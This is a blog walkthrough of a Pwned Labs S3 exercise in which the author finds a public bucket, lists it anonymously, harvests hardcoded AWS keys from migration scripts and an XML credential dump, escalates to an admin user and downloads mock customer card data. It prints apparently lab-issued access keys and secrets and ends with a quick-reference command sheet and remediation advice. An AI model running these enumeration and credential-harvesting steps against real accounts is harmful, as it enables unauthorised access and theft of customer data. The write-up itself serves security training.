Part 2 of my AWS pentesting series. In Part 1, I covered IAM enumeration from scratch. This post focuses on S3 — what it is, why it's a goldmine for attackers, and how a single public bucket misconfiguration can cascade into full credential compromise. All lab work done on Pwned Labs.
Why S3 Buckets Are a Pentester's Favourite Target
S3 (Simple Storage Service) is AWS's object storage — think of it as an FTP server in the cloud. Organizations use it for everything: static websites, backups, logs, file transfers, and migration scripts. That last one is where things get interesting.
Because S3 is so easy to use, it's also easy to misconfigure. The three misconfigurations that show up most often in real engagements are:
- Public read access — anyone on the internet can list and download files
- Overly permissive bucket policies — s3:* on the bucket and its objects, combined with Principal: "*", grants the world full access
- Sensitive files left in buckets — credentials, migration scripts, exports, database dumps
In this lab, we start with nothing but a domain name and end up with IT Admin credentials and a full database of customer credit card numbers. Here's every step.
Understanding S3 Access Control
Before diving into the lab, it's worth knowing how S3 access is controlled — because understanding the model is what lets you spot misconfigurations.
S3 has three access control layers:
- Bucket Policies — resource-based JSON policies attached directly to a bucket
- IAM Policies — identity-based policies controlling what a user/role can do with S3
- Access Control Lists (ACLs) — legacy method, largely replaced by the above two
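None of these checks are part of this lab's attack path, but if you ever hold credentials that can read a bucket's configuration, the AWS CLI can pull the resource-based layers directly. A minimal sketch, assuming the caller has s3:GetBucketPolicy / s3:GetBucketAcl permissions (anonymous callers will usually get AccessDenied here):

# Layer 1: the resource-based policy attached to the bucket
aws s3api get-bucket-policy --bucket [bucket-name]
# Quick check: does AWS itself consider the policy public?
aws s3api get-bucket-policy-status --bucket [bucket-name]
# Layer 3: legacy ACL grants
aws s3api get-bucket-acl --bucket [bucket-name]
# (Layer 2, the caller's own IAM policy, is enumerated against the identity — see Part 1)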
Here's what a dangerously misconfigured bucket policy looks like:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:*",
            "Resource": [
                "arn:aws:s3:::public-bucket",
                "arn:aws:s3:::public-bucket/*"
            ]
        }
    ]
}

Principal: "*" means anyone — authenticated or not. Action: "s3:*" means list, read, write, delete — everything. This is the worst-case scenario, and it exists in production environments more than you'd expect.
The Target: dev.huge-logistics.com
The lab gives us one starting point: http://dev.huge-logistics.com
Phase 1: Passive Recon — Finding the S3 Bucket
Step 1 — Probe the Domain
Sending a POST request to the domain returns:
405 Method Not Allowed
Code: MethodNotAllowed
Message: The specified method is not allowed against this resource.
Method: POST
ResourceType: OBJECT
RequestId: JR75KCAPC32EWZ99

The response structure — especially ResourceType: OBJECT — is a dead giveaway. This is an S3-hosted site responding with AWS-style error formatting.
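The lab doesn't prescribe a specific client for this probe; curl is one straightforward way to reproduce it and see the same error body:

# Send a POST to the dev site and inspect the error response
curl -s -X POST http://dev.huge-logistics.com
# -i also shows response headers — S3 responses typically include x-amz-request-id
curl -si -X POST http://dev.huge-logistics.com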
Step 2 — Check the Page Source
Viewing the source code confirms it:
<link rel="stylesheet" href="https://s3.amazonaws.com/dev.huge-logistics.com/static/style.css">

The stylesheet is being served directly from s3.amazonaws.com/dev.huge-logistics.com. The bucket name is the domain itself: dev.huge-logistics.com.
Takeaway: Always check page source when a target is web-facing. S3-hosted static sites frequently expose their bucket name in asset URLs.
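One quick way to do that without opening a browser — pull the page and grep the asset URLs for S3 hostnames. A small convenience sketch, not part of the lab's required steps:

# Fetch the page and extract any S3-style asset URLs
curl -s http://dev.huge-logistics.com | grep -Eo 'https?://[^"]*s3[^"]*amazonaws\.com[^"]*'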
Phase 2: Unauthenticated Enumeration
Step 3 — List the Bucket Without Credentials
The --no-sign-request flag tells the AWS CLI to make the request without any credentials — simulating what any anonymous user on the internet can see:
aws s3 ls s3://dev.huge-logistics.com --no-sign-request
PRE admin/
PRE migration-files/
PRE shared/
PRE static/
2023-10-16 22:30:47 5347 index.html

The bucket is publicly listable. Four directories are visible: admin, migration-files, shared, and static.
Step 4 — Enumerate Each Directory
aws s3 ls s3://dev.huge-logistics.com/admin/ --no-sign-request
# ERROR: AccessDenied
aws s3 ls s3://dev.huge-logistics.com/migration-files/ --no-sign-request
# ERROR: AccessDenied
aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
# → hl_migration_project.zip
aws s3 ls s3://dev.huge-logistics.com/static/ --no-sign-request
# → logo.png, script.js, style.css

admin/ and migration-files/ are locked down. But shared/ is accessible — and it contains a ZIP file: hl_migration_project.zip.
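When a bucket has more than a handful of prefixes, a small shell loop saves the repetition — a convenience sketch, not something the lab requires:

# Try to list each top-level prefix anonymously
for prefix in admin migration-files shared static; do
  echo "== ${prefix}/ =="
  aws s3 ls "s3://dev.huge-logistics.com/${prefix}/" --no-sign-request
done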
Step 5 — Download and Extract the ZIP
aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request
unzip hl_migration_project.zip

Extracted files:
migrate_secrets.ps1
Opening migrate_secrets.ps1 reveals hardcoded AWS credentials at the top of the script:
$accessKey = "AKIA3SFMDAPO7WLZVRVE"
$secretKey = "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"
$region = "us-east-1"

This is a PowerShell script intended to migrate secrets into AWS Secrets Manager. Instead of using IAM roles or environment variables, the developer hardcoded credentials directly into the script — then left the script in a publicly accessible S3 bucket.
First credential set acquired — no authentication required.
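AWS access key IDs follow a predictable format (long-lived user keys start with AKIA), so a quick grep over anything pulled out of a bucket surfaces them fast. A small sketch of that habit:

# Sweep the extracted archive for AWS access key IDs and likely secrets
grep -rE 'AKIA[0-9A-Z]{16}' .
grep -rEi '(secret|accesskey|password)[[:space:]]*=' .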
Phase 3: Authenticated Enumeration
Step 6 — Configure the Compromised Credentials
aws configure --profile pwnlab
AWS Access Key ID: AKIA3SFMDAPO7WLZVRVE
AWS Secret Access Key: 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
Default region name: us-east-1
Default output format: json

Confirm identity:
aws sts get-caller-identity --profile pwnlab
{
"UserId": "AIDA3SFMDAPOYPM3X2TB7",
"Account": "794929857501",
"Arn": "arn:aws:iam::794929857501:user/pam-test"
}

We're now operating as pam-test inside account 794929857501.
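Whenever a new key lands, it's worth asking what it can actually do before firing off requests. The IAM enumeration approach from Part 1 applies here — these calls will often come back AccessDenied for a low-privilege user like pam-test, but they're cheap to try:

# What managed and inline policies are attached to this user?
aws iam list-attached-user-policies --user-name pam-test --profile pwnlab
aws iam list-user-policies --user-name pam-test --profile pwnlab
# What groups (and therefore group policies) does the user belong to?
aws iam list-groups-for-user --user-name pam-test --profile pwnlab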
Step 7 — Re-Enumerate With Credentials
aws s3 ls s3://dev.huge-logistics.com/admin/ --profile pwnlab
2024-12-02 20:27:44 32 flag.txt
2023-10-17 01:54:07 2425 website_transactions_export.csv
aws s3 ls s3://dev.huge-logistics.com/migration-files/ --profile pwnlab
AWS Secrets Manager Migration - Discovery & Design.pdf
AWS Secrets Manager Migration - Implementation.pdf
migrate_secrets.ps1
test-export.xml

With pam-test credentials, both previously locked directories are now listable. The admin/ directory has a flag.txt and a CSV export. The migration-files/ directory has PDFs, another migration script, and an XML export.
Step 8 — Download From migration-files
Attempting to download from admin/ returns 403 Forbidden — pam-test can list but not read those objects. Move to migration-files/:
aws s3 cp s3://dev.huge-logistics.com/migration-files/migrate_secrets.ps1 . --profile pwnlab
aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml . --profile pwnlab

From migrate_secrets.ps1 — second set of hardcoded credentials:
$accessKey = "AKIA3SFMDAPOWOWKXEHU"
$secretKey = "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"

From test-export.xml — IT Admin credentials in plaintext:
<CredentialEntry>
    <ServiceType>AWS IT Admin</ServiceType>
    <AccountID>794929857501</AccountID>
    <AccessKeyID>AKIA3SFMDAPO6DGDLJAG</AccessKeyID>
    <SecretAccessKey>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</SecretAccessKey>
    <Notes>AWS credentials for production workloads. Do not share these keys outside of the organization.</Notes>
</CredentialEntry>

The same XML file also contains credentials for: Oracle Database, HP Server Cluster, Iron Mountain Backup, Office 365 Global Admin, and Jira Admin. An entire organization's credential store — sitting in an S3 bucket.
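To triage a file like this quickly rather than reading the whole dump, pulling just the service names and key material works — a rough sketch, assuming the other entries reuse the element names shown above:

# Inventory which services have entries in the dump
grep -o '<ServiceType>[^<]*</ServiceType>' test-export.xml
# Pull the AWS key material specifically
grep -E '<(AccessKeyID|SecretAccessKey)>' test-export.xml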
Phase 4: Escalating to IT Admin
Step 9 — Switch to IT Admin Credentials
aws configure --profile pwnlab
AWS Access Key ID: AKIA3SFMDAPO6DGDLJAG
AWS Secret Access Key: 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
aws sts get-caller-identity --profile pwnlab
{
"UserId": "AIDA3SFMDAPOWKM6ICH4K",
"Account": "794929857501",
"Arn": "arn:aws:iam::794929857501:user/it-admin"
}

Now operating as it-admin.
Step 10 — Access the Admin Directory
aws s3 cp s3://dev.huge-logistics.com/admin/flag.txt . --profile pwnlab
# → download: flag.txt ✓
aws s3 cp s3://dev.huge-logistics.com/admin/website_transactions_export.csv . --profile pwnlab
# → download: website_transactions_export.csv ✓

The website_transactions_export.csv contains live customer data — full credit card numbers, CVVs, expiry dates, usernames, and plaintext passwords for 29 customers.
network,credit_card_number,cvv,expiry_date,card_holder_name,username,password
Visa,4055497191304,386,5/2021,Hunter Miller,hunter_m,password123
Visa,4055491339081,492,8/2021,Jayden Adams,jay_adams,jayden2023
...

This is a full data breach scenario — triggered by one publicly accessible S3 bucket.
The Attack Chain — End to End
Public domain (dev.huge-logistics.com)
↓
Page source reveals S3 bucket name
↓
Bucket is publicly listable (no credentials needed)
↓
shared/ directory accessible anonymously
↓
migrate_secrets.ps1 downloaded → hardcoded AWS credentials (pam-test)
↓
pam-test can list admin/ and migration-files/
↓
test-export.xml downloaded → IT Admin AWS credentials + org-wide credential dump
↓
it-admin has full read access to admin/
↓
website_transactions_export.csv downloaded → 29 customer records, credit card data, plaintext passwords

Five steps from a domain name to a full data breach.
Findings Summary
| Finding | Severity | Detail |
| --- | --- | --- |
| S3 bucket publicly listable | High | No authentication required to list bucket contents |
| Hardcoded credentials in migrate_secrets.ps1 (shared/) | Critical | AWS access keys exposed to anonymous users |
| Second hardcoded credentials in migrate_secrets.ps1 (migration-files/) | Critical | Additional AWS keys stored in plaintext in script |
| test-export.xml contains org-wide credential dump | Critical | AWS IT Admin keys + Oracle DB, O365 Global Admin, Jira Admin, HP Cluster credentials |
| website_transactions_export.csv exposed | Critical | 29 customer records with full credit card numbers, CVVs, and plaintext passwords |
S3 Enumeration — Quick Reference
# Identify bucket from page source or domain
# List bucket anonymously
aws s3 ls s3://[bucket-name] --no-sign-request
# List subdirectory
aws s3 ls s3://[bucket-name]/[folder]/ --no-sign-request
# Download a file
aws s3 cp s3://[bucket-name]/[path/to/file] . --no-sign-request
# With credentials
aws configure --profile [profile-name]
aws s3 ls s3://[bucket-name]/ --profile [profile-name]
aws s3 cp s3://[bucket-name]/[path/to/file] . --profile [profile-name]
# Confirm identity after credential compromise
aws sts get-caller-identity --profile [profile-name]

Remediation — What Should Have Been Done
- Enable Block Public Access on all S3 buckets — AWS provides a single account-level toggle
- Never hardcode credentials in scripts — use IAM roles, environment variables, or AWS Secrets Manager
- Apply least-privilege bucket policies — no Principal: "*", no s3:* wildcards (see the sketch after this list)
- Audit bucket contents regularly — migration artifacts, exports, and backup files are routinely left behind
- Enable S3 server access logging — detect enumeration attempts before they escalate
- Enable AWS CloudTrail — full API activity logging across the account
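As a rough sketch of the first three fixes using the AWS CLI — bucket name and account ID are placeholders, and the policy shown is only an illustrative least-privilege shape, not a drop-in for every workload:

# Block Public Access on a single bucket
aws s3api put-public-access-block \
  --bucket [bucket-name] \
  --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true

# Or flip the account-level toggle so every bucket is covered
aws s3control put-public-access-block \
  --account-id [account-id] \
  --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true

# Replace Principal: "*" / s3:* with a scoped policy (illustrative only)
cat > policy.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::[account-id]:role/app-role" },
      "Action": ["s3:GetObject"],
      "Resource": "arn:aws:s3:::[bucket-name]/static/*"
    }
  ]
}
EOF
aws s3api put-bucket-policy --bucket [bucket-name] --policy file://policy.json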
Tools Used
- AWS CLI — aws s3 for listing and downloading, aws configure for profiles, aws sts get-caller-identity for identity checks
- unzip — extracting hl_migration_project.zip
Documenting my AWS pentesting journey as I go. Feedback welcome in the comments.
Tags: aws s3 penetration-testing cloud-security cybersecurity ethical-hacking infosec